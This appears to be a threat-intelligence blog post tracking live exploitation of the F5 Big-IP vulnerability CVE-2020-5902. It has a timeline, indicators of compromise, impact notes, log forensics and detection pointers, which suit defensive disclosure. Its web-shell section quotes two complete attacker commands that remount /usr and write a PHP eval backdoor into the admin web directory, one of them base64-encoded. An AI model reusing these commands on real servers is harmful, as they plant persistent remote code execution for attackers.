tl;dr

CVE-2020-5902 was disclosed on July 1st, 2020 by F5 Networks in K52145254 as a CVSS 10.0 remote code execution vulnerability in the Big-IP administrative interface. By July 3rd, 2020 NCC Group observed active exploitation. This blog is a summary of what we know as the situation develops.

About the Research and Intelligence Fusion Team (RIFT):
RIFT leverages our strategic analysis, data science, and threat hunting capabilities to create actionable threat intelligence, ranging from IoCs and detection capabilities to strategic reports on tomorrow’s threat landscape. Cyber security is an arms race where both attackers and defenders continually update and improve their tools and ways of working. To ensure that our managed services remain effective against the latest threats, NCC Group operates a Global Fusion Center with Fox-IT at its core. This multidisciplinary team converts our leading cyber threat intelligence into powerful detection strategies.

The Vulnerability / Patch

The vulnerability was discovered by Positive Technologies and an associated blog post released on July 2nd, 2020. NCC Group’s RIFT established a live post on Reddit on July 3rd to collate early intelligence and raise awareness within the cyber defence and sysadmin communities.

In the F5 knowledge base article K52145254 there is the following mitigation:

<LocationMatch ".*\.\.;.*">
Redirect 404 /
</LocationMatch>

This regex checks for:

..;

As such it can be described as a directory traversal vulnerability. This ability combined with functionality native to the device provides the ability to access files, upload files and execute code without authentication.

Timeline of Events

Exploitation

The graph below shows the exploitation seen on NCC Group’s honeypot during the morning of July 5th, 2020.

The graph below shows the exploitation seen on NCC Group’s honeypot during the morning of July 6th, 2020

Exploitation is varied including the access of password hashes:

As of Saturday remote code execution capabilities existed.

The first IPs we observed actively exploiting the issue were published at 17:00 UTC on July 4th, 2020 – https://github.com/nccgroup/Cyber-Defence/tree/master/Intelligence/CVE-2020-5902

In addition to these initial exploit attempts quickly there after details were shared in open source.

• 15:53 July 5th, 2020 fully functional exploit payloads were shared on Twitter
• 17:00 July 5th, 2020 reverse engineering analysis and example payloads were released on Github.
• 21:29 July 5th, 2020 Metasploit exploit modules were made available.
• 02:26 July 6th, 2020 Further exploits released on Github.
• 09:34 July 6th, 2020 Metasploit exploitation seen in the wild
• 10:18 July 6th, 2020 New second stages observed

Staged Exploitation

We have as of 10:00 on July 6th, 2020 started to see staged exploitation, namely a payload of:

The full payload is

We have as of 10:29 on July 6th, 2020 started to see a second staged exploitation, namely:

With a payload of

IoCs for the 2nd stage are

b8ce500c1e6ec4d4268ae0d2de82f9f35bbfc673  /tmp/demo.txt

We have as of 16:17 on July 6th, 2020 started to see a third staged exploitation, namely:

e1775079d58a6266fdd6185143642ac53b4314fe  /var/log/F5-logcheck/zabbix

another IoC for this actor is

/tmp/cepi

Of note this actor did their original scans on July 6th, 2020 at 10:30 and the returned ~6 hours later.

Webshells

As of 16:51 on July 6th, 2020 we’ve seen our first web shell

mount -o remount -rw /usr ; echo PD9waHAgQGV2YWwoYmFzZTY0X2RlY29kZSgkX1BPU1RbJ2NpdHJpeEBraGFycGVkYXInXSkpOz8+ | /usr/bin/openssl base64 -d -out /usr/local/www/xui/common/images/bg_status.php

when decoded appears to be a reused web shell from Citrix

<?php @eval(base64_decode($_POST['citrix@kharpedar']));?>

As of 09:26 on July 7th, 2020 we’ve seen a second web shell

mount -o remount -rw /usr ;echo 'utility<?php @eval(base64_decode($_POST["session_sK4hodQm"]));' > /usr/local/www/xui/common/scripts/utility.php;mount -o remount -r /usr

New Exploit from Release to Use in < 12 Hours

As of 12:30 on July 7th, 2020 we’ve seen use of a new exploit

Impact

As the devices are load balancers they provide the opportunity to:

• Acquire credentials
• Acquire access to existing sessions through cookie theft
• Acquire license keys
• Perform traffic interception and modification
• Pivot into the internal network
• Acquire the private keys to any SSL/TLS certificates on the device

Incident Analysis

There are forensics artifacts available, although the log they are stored is limited to 20MB and thus risks cycling quickly.

The wider HTTP log configuration differs from a default configuration.

#
# The location and format of the access logfile (Common Logfile Format).
# If you do not define any access logfiles within a <VirtualHost>
# container, they will be logged here.  Contrariwise, if you *do*
# define per-<VirtualHost> access logfiles, transactions will be
# logged therein and *not* in this file.     
#     
#CustomLog "logs/access_log" common     
#    
# If you prefer a logfile with access, agent, and referer information
# (Combined Logfile Format) you can use the following directive.     
#     
CustomLog "/var/run/httpd.pipe" acc_combined

The configuration causes it to send its output to a pipe. This pipe ultimately goes to systemd/journalctl

# grep httpd /etc/syslog-ng/syslog-ng_sysinit.conf.default 
source s_httpd {
   pipe("/var/run/httpd.pipe" optional(yes) perm(0660) group("apache"));
destination d_httpd_err {
   file("/var/log/httpd/httpd_errors" create_dirs(yes));
   source(s_httpd);
   destination(d_httpd_err);

Other forensic artifacts made include new .jsp files or similar used to achieve code execution.

Exploitation Detection

A Sigma rule has been created and available here. However in order to utilize it will require for the logs of the Big-IP to be sent to a SIEM as passive network detection won’t work unless SSL/TLS can be decrypted.

Incident Support

Believe your organisation may have been compromised? Contact us on [email protected]

Change Log

July 7th, 2020 @ 13:15 – v1.15 – added new exploit
July 7th, 2020 @ 09:26 – v1.14 – added the second web shell
July 6th, 2020 @ 17:09 – v1.13 – added the first web shell
July 6th, 2020 @ 16:40 – v1.12 – added another staged payload
July 6th, 2020 @ 13:13 – v1.11 – added detection aspects and session cookie theft
July 6th, 2020 @ 10:21 – v1.10 – added staged payload
July 6th, 2020 @ 09:48 – v1.9 – added Honeypot attack volumes from this morning
July 6th, 2020 @ 09:34 – v1.8 – added fact Metasploit exploitation seen in the wild
July 6th, 2020 @ 09:00 – v1.7 – added timeline of events
July 6th, 2020 @ 05:46 – v1.6 – added Metasploit modules and other public exploits released overnight
July 5th, 2020 @ 21:22 – v1.5 – added license key theft based on honeypot data
July 5th, 2020 @ 17:34 – v1.4 – included link to fully functional exploit being shared
July 5th, 2020 @ 16:28 – v1.3 – Further clarification on log pipe consumption
July 5th, 2020 @ 16:23 – v1.2 – New journalctl output example
July 5th, 2020 @ 16:16 – v1.1 – Clarified log pipe usage
July 5th, 2020 @ 15:40 – v1.0 – Initial version

Published July 5, 2020July 7, 2020